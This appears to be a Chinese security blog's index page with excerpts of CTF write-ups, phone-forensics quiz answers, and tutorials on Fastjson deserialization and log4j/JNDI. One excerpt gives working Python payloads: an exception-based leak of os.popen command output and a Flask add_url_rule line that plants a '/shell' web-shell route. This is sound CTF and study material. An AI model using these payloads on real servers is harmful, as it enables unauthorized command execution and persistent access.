L的博客

misc雪 压缩包尾部有隐写，可以得到解压密码。打开后有一张图片和一堆空白字体猜测为snow隐写图片存在盲水印得到snow隐写的key得到flag doSomeMath 我们可以看到在元组中存在__ge__魔术方法，其逻辑是大于等于，那么我们只要().__ge__(())就可以得到True True+True=2。构造出数字和其实就是一步步算上去了 Secret of Starven 打开流量包，我们导出文件会发现有一张图片和压缩包，说实话图片还挺好看(嘿嘿)压缩包需要密码，图片没有什么隐写，猜测密码应该外SMB的密钥，通过流量包来构造hash值 username::damonname: server challenge:ntproofstr:无ntproofstr的ntlmv2_response 1Starven::192.168.11.20:9a35e37a04717230:189bf0b02d2f766af2242dc455ad4fe1:0101000000000000ca1f069a8a09db01980131a514a3d32d0000000002001e ...

手机取证1.分析手机检材，请问此手机共通过adb连接过几个设备？(标准格式：3) 我们宿舍adb可以搜索道adb_keys其文件中有两个key,当使用adb链接其他设备时会生成一个公私钥,公钥存在adb_keys中.所以连接过两个 xml中还有时间戳 2.分析手机检材，机主参加考试的时间是什么时候？(标准格式：2024-06-17) 我们可以看到这个修改时间为8月12日,下周5也就是8月23 3.分析手机检材，请问手机的蓝牙Mac地址是多少？(标准格式：12:12:12:12:12:12) 4.分析手机检材，请问压缩包加密软件共加密过几份文件？(标准格式：3) 我们在应用列表里搜索关键词，如file,zip,rar,7z,Encryptor,Crypto等，如果搜不到就只能一个个看了，我们搜索file可以找到一个为FileCompress，文件压缩的软件。 我们搜索最后一个文件夹的名字来查找该应用的安装位置。会发现一个apk猜测为该软件的apk。 在安卓应用的数据一般存储在/storage/emulated/0 或 media/0文件夹下，我们在这些 ...

手机取证1.请分析涉案手机的设备标识是_。（标准格式：12345678） 2.请确认嫌疑人首次安装目标APP的安装时间是__。（标准格式：2023-09-13.11:32:23） 3.此检材共连接过__个WiFi。（标准格式：1） 4.嫌疑人手机短信记录中未读的短信共有__条。（标准格式：12）查看手机短信数据库mmssms.db 是 Android 系统中用于存储短信和多媒体信息的数据库文件，主要用于管理和存储短信（SMS）和多媒体消息（MMS）。该文件通常位于 Android 系统的内部存储中，并通过系统自带的短信应用或其他第三方应用进行访问和管理。其read列应该为是否读取数一下有17个 5.嫌疑人检材手机在浏览器中下载海报背景图的网址是_。（标准格式：http://www.baidu.com/admin/index.html） 搜索海报可以得到背景网址 6.请分析涉案海报的推广ID是__。（标准格式：123456）打开文件分类中的图片，可以找到背景与下载海报相同的 7.嫌疑人通过短信群发去推广APP，请问收件人中有__个号码是无效的。（标准格式：12） 只收到了一条运营商的信息 ...

本人最近这段时间才开始学java，如有出错请各位大佬指正fastJson反序列化其实应该分为两种,一种是通过JSON.parse(payload);时调用了本地类中的setter法从而导致的命令指向。第二种就是fastJson的原生反序列化了，即readObject触发的反序列化，这篇文章我先写一下第一种的fastJson的基础使用方法与一些特性的介绍1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859//User.javapackage fastjson;import java.io.IOException;import java.util.function.Function;public class User { public String name; public int age; public User(String name, int age){ System. ...

既然报名了美亚当然得学一下取证了，先写一下21年的美亚吧检材处理 首先下载的检材有一个电脑的镜像文件，和压缩包解压这个压缩包。里面是一个加密容器，将加密容器用VeraCrypt打开，进入容器文件，可以发现一个检材列表根据列表一个个整理检材 1.工地主管电话的微信账号是什么? 主办方在手机附件内，带了一个取证软件，我们直接打开这个软件。 在聊天报告里可以发现，其使用的聊天软件是whatapp，没有微信，所以这题选d，工地主管没有微信 2.工地主管的隔空投送装置置编号是什么?首先了解一下什么是隔空投送我们搜索AirDrop 3.工地主管电话的哪一个应用程序有关于经纬度24.490474, 118.110220的纪录?同样搜索 4.工地主管的手提电话中下列哪些数据正确? 选A，C 5.工地主管的电话最常使用的浏览器是什么? (请以英文全大写回答) SAFARI网页浏览记录里有浏览器名称 6.工地主管的电话连接过哪一个WiFi? 再无线网络了可以找到之前连接的WiFi名 7.工地主管与Alex Chan的Whatsapp 对话中，曾提及以下哪个TeamViewer的用户号码? 聊天记录的这三 ...

本文章首发于先知社区从JNDI注入到log4j漏洞今天闲的慌，不知道学些什么，于是去NSS上找一下java的题目想着刷点题，于是刷到了一题log4j的题目，一直都能听说这个log4j的核弹级漏洞的威名想着学一下，于是就有了这篇文章 JNDI首先我们要先了解一下什么是JNDIJNDI全名(Java Naming and Directory Interface即Java命名和目录接口) 命名服务命名服务的主要功能是将人们的友好名称映射到对象，例如地址、标识符或计算机程序通常使用的对象。 例如，Internet 域名系统 （DNS） 将计算机名称映射到 IP 地址： www.example.com ==> 192.0.2.5文件系统将文件名映射到程序可用于访问文件内容的文件引用。 c:\bin\autoexec.bat ==> File Reference 目录服务许多命名服务都使用目录服务进行扩展。目录服务将名称与对象相关联，并将此类对象与属性相关联。 目录服务 = 命名服务 + 包含属性的对象 您不仅可以按对象名称查找对象，还可以获取对象的属性或根据对象的属性搜索对象。例如， ...

关于python命令执行不出网无回显的情况下主要分为两种情况，开启debug未开启debug开启debug使用exec("raise%20Exception(__import__(%27os%27).popen(%27whoami%27).read())")来进行报错输出命令执行结果 未开启debugadd_url_route在老版本的flask在进行请求后仍然是可以通过addurlroute来添加路由的，但是新版本对其进行了修改导致其无法注入内存马，但是老版本还是可以使用的1sys.modules['__main__'].__dict__['app'].add_url_rule('/shell','shell',lambda :__import__('os').popen(request.args.get('shell')).read())通过`sys.modules[‘main‘].__dict[‘app’]获取该flask下的app。而后调用 ...

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293include 'init.php';function addUser($data,$username,$password){ $ret = array( 'code'=>0, 'message'=>'娣诲姞鎴愬姛' ); if(existsUser($data,$username)==0){ $s = $data.$username.'@'.$password.'|'; file_put_contents(DB_PATH, $s); }else{ $ret[ ...